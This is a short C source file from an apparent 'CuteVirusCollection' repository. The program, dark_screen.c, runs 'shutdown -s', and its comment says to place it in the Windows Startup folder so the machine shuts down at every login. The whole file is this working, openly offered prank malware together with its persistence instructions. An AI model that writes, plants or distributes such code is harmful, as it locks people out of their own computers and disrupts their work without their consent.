Files
CuteVirusCollection/dark_screen.c
2019-03-02 23:24:48 +06:00

9 lines
186 B
C

// Simply shuts the system down.
// Put it in the startup directory (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup)
#include <stdlib.h>
main(){
system("shutdown -s");
}